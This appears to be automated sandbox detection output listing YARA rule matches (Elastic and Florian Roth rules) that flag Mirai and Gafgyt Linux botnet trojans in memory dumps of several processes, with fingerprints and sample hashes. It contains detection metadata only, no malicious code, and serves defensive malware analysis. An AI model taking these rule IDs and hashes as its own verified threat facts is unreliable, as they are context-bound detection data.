Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_aa39fb02 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = b136ba6496816ba9737a3eb0e633c28a337511a97505f06e52f37b38599587cb, id = aa39fb02-ca7e-4809-ab5d-00e92763f7ec, last_modified = 2021-09-16
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_aa39fb02 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = b136ba6496816ba9737a3eb0e633c28a337511a97505f06e52f37b38599587cb, id = aa39fb02-ca7e-4809-ab5d-00e92763f7ec, last_modified = 2021-09-16
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_aa39fb02 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = b136ba6496816ba9737a3eb0e633c28a337511a97505f06e52f37b38599587cb, id = aa39fb02-ca7e-4809-ab5d-00e92763f7ec, last_modified = 2021-09-16
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_28a2fe0c os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = a2c6beaec18ca876e8487c11bcc7a29279669588aacb7d3027d8d8df8f5bcead, id = 28a2fe0c-eed5-4c79-81e6-3b11b73a4ebd, last_modified = 2021-09-16
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_fa3ad9d0 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = fe93a3552b72b107f95cc5a7e59da64fe84d31df833bf36c81d8f31d8d79d7ca, id = fa3ad9d0-7c55-4621-90fc-6b154c44a67b, last_modified = 2021-09-16
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_93fc3657 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d01a9e85a01fad913ca048b60bda1e5a2762f534e5308132c1d3098ac3f561ee, id = 93fc3657-fd21-4e93-a728-c084fc0a6a4a, last_modified = 2021-09-16
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_804f8e7c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 1080d8502848d532a0b38861437485d98a41d945acaf3cb676a7a2a2f6793ac6, id = 804f8e7c-4786-42bc-92e4-c68c24ca530e, last_modified = 2021-09-16
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_99d78950 reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3008edc4e7a099b64139a77d15ec0e2c3c1b55fc23ab156304571c4d14bc654c, id = 99d78950-ea23-4166-a85a-7a029209f5b1, last_modified = 2021-09-16
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_aa39fb02 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = b136ba6496816ba9737a3eb0e633c28a337511a97505f06e52f37b38599587cb, id = aa39fb02-ca7e-4809-ab5d-00e92763f7ec, last_modified = 2021-09-16
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_a68e498c reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 951c9dfcba531e5112c872395f6c144c4bc8b71c666d2c7d9d8574a23c163883, id = a68e498c-0768-4321-ab65-42dd6ef85323, last_modified = 2021-09-16
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ae9d0fa6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = ca2bf2771844bec95563800d19a35dd230413f8eff0bd44c8ab0b4c596f81bfc, id = ae9d0fa6-be06-4656-9b13-8edfc0ee9e71, last_modified = 2021-09-16
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
